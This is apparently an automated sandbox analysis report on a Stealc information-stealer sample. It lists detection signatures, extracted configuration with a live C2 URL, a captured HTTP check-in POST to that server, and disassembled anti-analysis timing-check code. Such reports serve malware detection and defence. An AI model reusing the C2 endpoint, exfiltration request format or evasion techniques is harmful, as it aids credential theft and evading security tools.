
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543747
MD5: fae77ee19103237b52405630de9aa6a7
SHA1: 5fa3fae94c12a0fc0fa6de9d9dfb72aa0ee0749b
SHA256: 09a622aeeec375f783c6a88a7f9bb6f9a1cf90af6dcf2d57f18eda2ca5a88cca
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6528 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FAE77EE19103237B52405630DE9AA6A7)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration (Malware Configuration Extractor): {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Yara matches:
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2065563617.0000000005130000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 6528 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 6528 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.2.file.exe.7e0000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Sigma: No Sigma rule has matched.

Suricata IDS alerts:
Timestamp: 2024-10-28T11:22:06.086992+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 185.215.113.206 | Destination Port: 80 | Protocol: TCP


                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.7e0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007F9030: CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007EA210: CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007EA2B0: CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007E72A0: GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007EC920: lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2065563617.000000000515B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2065563617.000000000515B000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007F40F0: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007EE530: FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007E1710: FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007F47C0: GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007EF7B0: FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007F4B60: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007F3B00: wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007EDB80: FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007EBE40: FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007EEE20: wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007EDF10: FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (Content-Length 210; the multipart body is shown decoded as ASCII):
    POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK
    Host: 185.215.113.206
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache

    ------HJDBFBKKJDHJKECBGDAK
    Content-Disposition: form-data; name="hwid"

    9AFA67DB7218194301792
    ------HJDBFBKKJDHJKECBGDAK
    Content-Disposition: form-data; name="build"

    tale
    ------HJDBFBKKJDHJKECBGDAK--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (observed 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007E62D0: InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/m
Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpH
Source: file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpl
Source: file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206xj:o
Source: file.exe, file.exe, 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2065563617.000000000515B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: String function 007E4610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: gauffcuy ZLIB complexity 0.9951195825030656
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007F9790: CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007F3970: CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\B4NB3DDZ.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2108416 > 1048576
Source: file.exe | Static PE information: Raw size of gauffcuy is bigger than: 0x100000 < 0x197c00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.7e0000.0.unpack | section rights after unpacking: :EW; .rsrc:W; .idata:W; :EW; gauffcuy:EW; psmvcilc:EW; .taggant:EW | vs on disk: :ER; .rsrc:W; .idata:W; :EW; gauffcuy:EW; psmvcilc:EW; .taggant:EW
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_007F9BB0: GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x20a51a should be: 0x20d3d2
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: gauffcuy
Source: file.exe | Static PE information: section name: psmvcilc
Source: file.exe | Static PE information: section name: .taggant
Source: file.exe | Static PE information: section name: gauffcuy, entropy: 7.95487743480404

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-37874
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE28E second address: ACE294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4A56F second address: C4A573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4A573 second address: C4A58A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBA68C246D6h 0x00000008 jmp 00007FBA68C246DDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4457C second address: C4459E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36BFh 0x00000009 jns 00007FBA693F36B6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49791 second address: C49795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49BA1 second address: C49BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49BAB second address: C49BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FBA68C246E7h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49BCB second address: C49BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CB7C second address: C4CBB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1AA4h], ebx 0x00000011 push 00000000h 0x00000013 push B12767D8h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FBA68C246E8h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CBB2 second address: C4CBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CBB8 second address: C4CC1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4ED898A8h 0x0000000f push 00000003h 0x00000011 mov esi, dword ptr [ebp+122D2C80h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FBA68C246D8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 call 00007FBA68C246E0h 0x00000038 jnc 00007FBA68C246DCh 0x0000003e pop esi 0x0000003f push 00000003h 0x00000041 cmc 0x00000042 call 00007FBA68C246D9h 0x00000047 push esi 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CC1E second address: C4CC30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 jnc 00007FBA693F36BEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CC30 second address: C4CC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FBA68C246D6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CC42 second address: C4CC66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FBA693F36BCh 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CC66 second address: C4CC7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA68C246DAh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CC7D second address: C4CC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CD36 second address: C4CDF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FBA68C246D8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 movzx ecx, si 0x00000027 push 00000000h 0x00000029 adc edx, 35F59484h 0x0000002f push AC5008F7h 0x00000034 jbe 00007FBA68C246EFh 0x0000003a jmp 00007FBA68C246E9h 0x0000003f add dword ptr [esp], 53AFF789h 0x00000046 mov edi, dword ptr [ebp+122D3917h] 0x0000004c push 00000003h 0x0000004e mov dword ptr [ebp+122D3A4Ch], ecx 0x00000054 push 00000000h 0x00000056 mov dword ptr [ebp+122D3A10h], ebx 0x0000005c mov edx, 68C1A197h 0x00000061 push 00000003h 0x00000063 mov di, bx 0x00000066 push 8FF3CD00h 0x0000006b jmp 00007FBA68C246E7h 0x00000070 xor dword ptr [esp], 4FF3CD00h 0x00000077 sub dword ptr [ebp+122D2907h], eax 0x0000007d lea ebx, dword ptr [ebp+12452AA4h] 0x00000083 mov dword ptr [ebp+12452876h], eax 0x00000089 push eax 0x0000008a jp 00007FBA68C246E0h 0x00000090 push eax 0x00000091 push edx 0x00000092 pushad 0x00000093 popad 0x00000094 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CE34 second address: C4CE5B instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA693F36B8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D2AD8h] 0x00000015 push 00000000h 0x00000017 sub dword ptr [ebp+122D37A7h], ecx 0x0000001d push 269AF360h 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CE5B second address: C4CE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CE5F second address: C4CEB5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA693F36B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b xor dword ptr [esp], 269AF3E0h 0x00000012 push 00000003h 0x00000014 mov cx, 3A13h 0x00000018 push 00000000h 0x0000001a cld 0x0000001b push 00000003h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FBA693F36B8h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D3998h], esi 0x0000003d push D4468BE2h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jnp 00007FBA693F36B6h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CEB5 second address: C4CEBB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CEBB second address: C4CEFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 14468BE2h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FBA693F36B8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a cmc 0x0000002b lea ebx, dword ptr [ebp+12452AAFh] 0x00000031 mov dx, ax 0x00000034 push eax 0x00000035 pushad 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CEFF second address: C4CF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E2E6 second address: C5E2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69FF6 second address: C69FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69FFC second address: C6A000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A723 second address: C6A749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b je 00007FBA68C246E8h 0x00000011 jmp 00007FBA68C246E0h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A749 second address: C6A751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A751 second address: C6A757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AC08 second address: C6AC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AC0E second address: C6AC45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jc 00007FBA68C246D6h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FBA68C246E4h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AC45 second address: C6AC55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBA693F36B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
